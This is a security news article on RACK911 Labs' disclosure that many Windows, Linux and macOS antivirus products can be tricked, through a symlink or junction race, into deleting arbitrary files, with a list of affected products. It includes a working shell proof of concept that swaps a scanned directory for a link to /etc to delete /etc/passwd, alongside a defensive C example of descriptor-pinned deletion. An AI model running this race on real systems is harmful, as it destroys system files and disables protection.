Most antiviruses can be attacked through symbolic links

Researchers from RACK911 Labs found that almost all antivirus packages for Windows, Linux and macOS were vulnerable to attacks that exploit a race condition during the deletion of files in which malware has been detected.

To carry out the attack, you place a file that the antivirus recognizes as malicious (for example, one carrying a test signature). After some time, once the antivirus has detected the malicious file but immediately before it calls the function that deletes it, you replace the directory containing the file with a symbolic link. On Windows, the same effect is achieved by substituting the directory with a directory junction. The problem is that almost all antiviruses did not properly check symbolic links and, believing they were deleting the malicious file, deleted the file in the directory the symbolic link points to.

For Linux and macOS it is shown how an unprivileged user can delete /etc/passwd or any other system file this way, and for Windows how the antivirus's own DLL library can be deleted to block its operation (on Windows the attack is limited to deleting files that are not currently in use by other applications). For example, an attacker can create an "exploit" directory, place in it an EpSecApiLib.dll file with a test virus signature, and replace the "exploit" directory with a link to "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform" before the deletion, which results in the EpSecApiLib.dll library being removed from the antivirus directory. On Linux and macOS, a similar trick can be done by replacing the directory with a link to "/etc".

#!/bin/sh
# Place the EICAR test file where the antivirus will scan it
rm -rf /home/user/exploit; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
# When the scanner opens the file, replace the directory with a link to /etc
while inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
    rm -rf /home/user/exploit; ln -s /etc /home/user/exploit
done
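
An added example (not code from RACK911 Labs or any antivirus vendor) that puts the path-based deletion described above beside a hardened form that pins the directory by file descriptor at scan time and deletes relative to it. The names pin_file, delete_pinned and demo are hypothetical; the demo assumes a POSIX.1-2008 system and runs in a constructed mkdtemp() directory in which "protected" stands in for /etc.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

typedef struct { int dirfd; dev_t dev; ino_t ino; } pinned_t;
/* Scan time: pin the directory by fd and record the flagged file's identity. */
int pin_file(const char *dir, const char *name, pinned_t *p) {
    struct stat st;
    if ((p->dirfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC)) < 0) return -1;
    int bad = fstatat(p->dirfd, name, &st, AT_SYMLINK_NOFOLLOW) || !S_ISREG(st.st_mode);
    if (bad) { close(p->dirfd); return -1; }
    p->dev = st.st_dev; p->ino = st.st_ino;
    return 0;
}

/* Delete time: unlink relative to the pinned fd; the path is never re-resolved. */
int delete_pinned(pinned_t *p, const char *name) {
    struct stat st;
    int rc = -1;
    if (!fstatat(p->dirfd, name, &st, AT_SYMLINK_NOFOLLOW) && S_ISREG(st.st_mode)
        && st.st_dev == p->dev && st.st_ino == p->ino)
        rc = unlinkat(p->dirfd, name, 0);
    close(p->dirfd);
    return rc;
}

/* Constructed demo in a mkdtemp() dir; "protected" stands in for /etc.
   hardened=0 deletes by path (the flaw). Returns 1 if the protected file survives. */
int demo(int hardened) {
    char base[] = "/tmp/avdemoXXXXXX", work[64], prot[64], moved[64], path[96];
    pinned_t p;
    if (!mkdtemp(base)) return -1;
    snprintf(work, sizeof work, "%s/exploit", base);
    snprintf(prot, sizeof prot, "%s/protected", base);
    snprintf(moved, sizeof moved, "%s/moved", base);
    if (mkdir(work, 0700) || mkdir(prot, 0700)) return -1;
    snprintf(path, sizeof path, "%s/passwd", prot); close(open(path, O_CREAT | O_WRONLY, 0600));
    snprintf(path, sizeof path, "%s/passwd", work); close(open(path, O_CREAT | O_WRONLY, 0600));
    if (pin_file(work, "passwd", &p)) return -1;                 /* "scan" of the flagged file */
    if (rename(work, moved) || symlink(prot, work)) return -1;   /* directory swapped for a link */
    if (hardened) delete_pinned(&p, "passwd"); else { close(p.dirfd); unlink(path); }
    snprintf(path, sizeof path, "%s/passwd", prot);
    return access(path, F_OK) == 0;
}

int main(void) { printf("by path: %d, pinned fd: %d\n", demo(0), demo(1)); return 0; }
```

O_NOFOLLOW guards only the final path component, so a real scanner has to walk the earlier components with the same descriptor-relative calls.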



In addition, many antivirus programs for Linux and macOS were found to use predictable file names when working with temporary files in the /tmp and /private/tmp directories, which could be used to escalate privileges to the root user.

At present, the problems have already been fixed by most vendors, but it is notable that the first notifications about the problem were sent to the developers in the fall of 2018. Although not all vendors have released fixes, they were given roughly six months to patch, and RACK911 Labs believes it is now free to disclose the vulnerabilities publicly. It is noted that RACK911 Labs has been working on finding vulnerabilities for a long time, but did not expect that it would be so difficult to work with colleagues from the antivirus industry because of delays in releasing fixes and disregard for the need to fix security problems promptly.

Affected products (the free antivirus package ClamAV is not listed):

  • Linux
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • Eset File Server Security
    • F-Secure Linux Security
    • Kaspersky Endpoint Security
    • McAfee Endpoint Security
    • Sophos Anti-Virus for Linux
  • Windows
    • Avast Free Anti-Virus
    • Avira Free Anti-Virus
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • F-Secure Computer Protection
    • FireEye Endpoint Security
    • Intercept X (Sophos)
    • Kaspersky Endpoint Security
    • Malwarebytes for Windows
    • McAfee Endpoint Security
    • Panda Dome
    • Webroot Secure Anywhere
  • macOS
    • AVG
    • BitDefender Total Security
    • Eset Cyber Security
    • Kaspersky Internet Security
    • McAfee Total Protection
    • Microsoft Defender (BETA)
    • Norton Security
    • Sophos Home
    • Webroot Secure Anywhere

    Source: opennet.ru
